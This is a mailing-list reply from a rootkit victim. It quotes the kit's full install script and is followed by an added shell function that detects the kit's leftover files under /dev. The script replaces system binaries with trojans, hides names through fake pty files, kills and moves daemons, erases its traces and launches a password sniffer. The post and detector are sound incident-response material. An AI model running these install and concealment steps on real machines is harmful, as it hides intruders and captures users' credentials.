>> There were a whole shit-load of files that got changed. ls is one of them
>> that was changed. Get that put back and then go look at /tmp. In there you
>> will find rk and rki. In the rk directory you will find rkinstall. It
>> contains a list of all the files that got changed.
>
>I must have lucked out. I grabbed a new copy of ls, checked, and didn't
>find rk in the tmp dir. Then I grabbed a new copy of find and ran
>
> find / -name 'rk*' -print
>
>and it didn't find anything.
>
>Maybe I lucked out?

I doubt it. That directory contained the initial files to be deposited on
your system. This is what the script looked like:

./fix /usr/bin/chfn bin/chfn
./fix /usr/bin/chsh bin/chsh
./fix /bin/login bin/login
./fix /bin/ls fileutils-3.13/src/ls
./fix /bin/du fileutils-3.13/src/du
./fix /usr/bin/passwd bin/passwd
./fix /bin/ps procps-1.01/ps
./fix /usr/bin/top procps-1.01/top
./fix /usr/sbin/in.rshd rshd/rshd
./fix /bin/netstat net-tools-1.32-alpha/netstat
./fix /sbin/ifconfig net-tools-1.32-alpha/ifconfig
./fix /usr/sbin/syslogd sysklogd-1.3/syslogd
./fix /usr/sbin/inetd inetd/inetd
./fix /usr/sbin/tcpd tcpd_7.4/tcpd
./fix /usr/bin/killall psmisc/killall
./fix /bin/killall psmisc/killall
ln -sf /bin/killall psmisc/pidof
ln -sf /usr/bin/killall psmisc/pidof
./fix /usr/bin/pidof psmisc/pidof
./fix /sbin/pidof psmisc/pidof
./fix /usr/bin/find findutils/find/find
echo ".rtmp" > /dev/ptyr
echo ".tmp" >> /dev/ptyr
echo "..." >> /dev/ptyr
echo " " >> /dev/ptyr
echo "rk" >> /dev/ptyr
echo "rks" >> /dev/ptyr
echo ".. " >> /dev/ptyr
echo "3 imap" > /dev/ptyp
echo "3 eggdrop" >> /dev/ptyp
echo "3 conf" >> /dev/ptyp
echo "3 sniff" >> /dev/ptyp
echo "unknown" > /dev/ptys
echo "unk" >> /dev/ptys
echo "unkn0wn" >> /dev/ptys
echo "crime" >> /dev/ptys
echo "1 195" > /dev/ptyq
echo "1 207" >> /dev/ptyq
echo "1 63" >> /dev/ptyq
killall -9 rpc.mountd rpc.portmap rpc.nfsd smbd portmap 1>/dev/null 2>/dev/null
killall -9 named nmbd snmpd ypasswd 1>/dev/null 2>/dev/null
killall -9 rpc.yppasswdd 1>/dev/null 2>/dev/null
mkdir /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/rpc.* /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/smbd /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/portmap /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/nmbd /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/named /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/snmpd /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/imapd /dev/.rtmp 1>/dev/null 2>/dev/null
cat /etc/inetd.conf|grep -v imap > /etc/inetd.conf.good
mv /etc/inetd.conf.good /etc/inetd.conf
killall -HUP inetd 1>/dev/null 2>/dev/null
rm -rf bin fileutils-3.13 findutils fix inetd
rm -rf net-tools-1.32-alpha procps-1.01 psmisc rshd sysklogd-1.3
rm -rf tcpd_7.4 Makefile
if test -f ../rk.tgz; then rm -rf ../rk.tgz; fi 1>/dev/null 2>/dev/null 3>/dev/null
if test -f ../rk.tar; then rm -rf ../rk.tar; fi 1>/dev/null 2>/dev/null 3>/dev/null
if test -f ../u.tgz; then tar -zxf ../u.tgz; rm -rf ../u.tgz; fi 1>/dev/null 2>/dev/null 3>/dev/null
./linsniffer > tcp.log &

For some reason, the directory was never removed on my system.

MB
--
e-mail: [EMAIL PROTECTED]
Bart: Hey, why is it destroying other toys? Lisa: They must have
programmed it to eliminate the competition. Bart: You mean like
Microsoft? Lisa: Exactly. [The Simpsons - 12/18/99]
Visit - URL:http://www.vidiot.com/ (Your link to Star Trek and UPN)
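
A check for what the script quoted above leaves under /dev (the regular files ptyr, ptyp, ptys and ptyq, and the /dev/.rtmp directory), added here as an example and not part of the original thread. The function name rk_dev_check and the demo tree are made up for illustration; it uses only shell builtins because ls, find, du and ps are among the binaries the script replaces.

```shell
#!/bin/sh
# Added example, not from the original post. Checks for what the install
# script above leaves under /dev, using only shell builtins ([, read, printf):
# ls, find, du and ps are on the script's replacement list, the shell is not.

# rk_dev_check ROOT
#   ROOT is "" for the running system, or the mount point of a disk image.
#   Prints each finding; returns 0 if nothing was found, 1 otherwise.
rk_dev_check() {
    root=${1:-}
    found=0
    # The script writes these with echo, so they end up as regular files.
    # Real pty nodes are character devices and carry a unit suffix (ptyp0).
    for name in ptyr ptyp ptys ptyq; do
        p="$root/dev/$name"
        [ -f "$p" ] || continue
        found=1
        printf 'regular file where a device node belongs: %s\n' "$p"
        # Quote each entry so names made only of spaces or dots stay visible.
        while IFS= read -r line || [ -n "$line" ]; do
            printf '    entry: "%s"\n' "$line"
        done < "$p"
    done
    # Directory the script creates to hold the daemons moved out of /usr/sbin.
    if [ -d "$root/dev/.rtmp" ]; then
        found=1
        printf 'directory created by the script: %s\n' "$root/dev/.rtmp"
        for f in "$root"/dev/.rtmp/* "$root"/dev/.rtmp/.[!.]*; do
            [ -e "$f" ] && printf '    holds: %s\n' "$f"
        done
    fi
    return "$found"
}

# Demo on a constructed tree (sample data, not a real system).
demo=$(mktemp -d)
mkdir -p "$demo/dev/.rtmp"
printf '.rtmp\n \nrk\n.. \n' > "$demo/dev/ptyr"
: > "$demo/dev/.rtmp/portmap"
rk_dev_check "$demo" || echo "=> rootkit artifacts present under $demo/dev"
rm -rf "$demo"
```

Run it from a shell started off known-good media where possible, passing the mount point of the suspect disk as ROOT.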